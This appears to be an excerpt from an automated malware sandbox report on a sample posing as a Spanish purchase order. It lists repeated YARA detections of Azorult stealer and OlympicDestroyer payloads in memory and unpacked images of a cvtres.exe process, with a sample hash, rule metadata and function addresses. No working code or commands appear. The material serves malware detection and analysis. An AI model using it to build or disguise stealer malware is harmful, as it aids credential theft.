Source: 1.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 1.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Azorult Payload Author: kevoreilly
Source: 1.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 1.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Azorult Payload Author: kevoreilly
Source: 1.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 1.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Azorult Payload Author: kevoreilly
Source: 1.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 1.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Azorult Payload Author: kevoreilly
Source: 1.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 1.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Azorult Payload Author: kevoreilly
Source: 1.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 1.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Azorult Payload Author: kevoreilly
Source: 1.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 1.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Azorult Payload Author: kevoreilly
Source: 1.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.cvtres.exe.7e35982.5.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 1.2.cvtres.exe.7e3b8e3.4.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 1.2.cvtres.exe.7e414d2.6.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 00000001.00000000.248942345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 00000001.00000000.248942345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Azorult Payload Author: kevoreilly
Source: 00000001.00000000.248942345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000000.249057187.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 00000001.00000000.249057187.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Azorult Payload Author: kevoreilly
Source: 00000001.00000000.249057187.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000000.248993320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 00000001.00000000.248993320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Azorult Payload Author: kevoreilly
Source: 00000001.00000000.248993320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.298767805.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 00000001.00000002.298767805.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Azorult Payload Author: kevoreilly
Source: 00000001.00000002.298767805.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000000.249215469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 00000001.00000000.249215469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Azorult Payload Author: kevoreilly
Source: 00000001.00000000.249215469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000000.248868745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 00000001.00000000.248868745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Azorult Payload Author: kevoreilly
Source: 00000001.00000000.248868745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.250173775.0000000003A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 00000000.00000002.250173775.0000000003A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 1.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 1.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 1.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPE Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 1.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPE Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.cvtres.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 1.0.cvtres.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 1.0.cvtres.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 1.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 1.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 1.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 1.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 1.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 1.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 1.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 1.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 1.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 1.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 1.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 1.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 1.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 1.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 1.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 1.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 1.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 1.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 1.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 1.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.cvtres.exe.7e35982.5.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 1.2.cvtres.exe.7e3b8e3.4.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 1.2.cvtres.exe.7e414d2.6.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 00000001.00000000.248942345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 00000001.00000000.248942345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000001.00000000.248942345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000000.249057187.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 00000001.00000000.249057187.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000001.00000000.249057187.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000000.248993320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 00000001.00000000.248993320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000001.00000000.248993320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.298767805.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 00000001.00000002.298767805.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000001.00000002.298767805.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000000.249215469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 00000001.00000000.249215469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000001.00000000.249215469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000000.248868745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 00000001.00000000.248868745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000001.00000000.248868745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.250173775.0000000003A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 00000000.00000002.250173775.0000000003A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Code function: 0_2_028B0448 0_2_028B0448
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Code function: 0_2_028B4E48 0_2_028B4E48
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Code function: 0_2_028B17C9 0_2_028B17C9
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Code function: 0_2_028B2D08 0_2_028B2D08
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Code function: 0_2_028B3B08 0_2_028B3B08
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Code function: 0_2_028BB4B8 0_2_028BB4B8
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Code function: 0_2_028B2CF8 0_2_028B2CF8
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Code function: 0_2_028BAA11 0_2_028BAA11
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Code function: 0_2_028BAA20 0_2_028BAA20
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Code function: 0_2_028B0427 0_2_028B0427
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Code function: 0_2_028B2078 0_2_028B2078
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Code function: 0_2_028BDFD8 0_2_028BDFD8
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Code function: 0_2_028BB508 0_2_028BB508
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Code function: 0_2_028BD958 0_2_028BD958
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Code function: 0_2_028BBF60 0_2_028BBF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: String function: 00403B98 appears 44 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: String function: 00404E64 appears 33 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: String function: 00404E3C appears 87 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: String function: 004062D8 appears 34 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: String function: 004034E4 appears 36 times
Source: api-ms-win-core-handle-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.1.dr Static PE information: No import functions for PE file found
